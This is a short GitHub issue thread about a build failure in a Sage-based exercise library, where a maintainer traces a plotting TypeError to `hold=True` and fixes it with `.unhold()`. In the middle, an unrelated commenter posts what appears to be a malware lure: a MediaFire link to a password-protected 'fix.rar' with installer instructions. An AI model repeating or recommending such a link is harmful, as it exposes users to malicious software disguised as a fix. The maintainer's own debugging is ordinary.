### ISSUE TITLE
LF3 Checkit causing build fail

### ISSUE THREAD

**Issue by siwelwerd** [TeamBasedInquiryLearning/library#269]
Looks to be an error in the plotting, specifically

`TypeError: Cannot convert sage.symbolic.expression.Expression to sage.ext.fast_callable.Expression`

I think I have tracked it down... testing a fix now

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by siwelwerd** [comment]
Building a full 1000 to be sure, but what I think happened is the cause is that we used `hold=True` to have an equation display like we want, and then later plotted it.  For some reason, at least 0.1% of the time this causes an error where it is not being evaluated because of the `hold=True`.  Fix is to `.unhold()` before passing to `plot`.
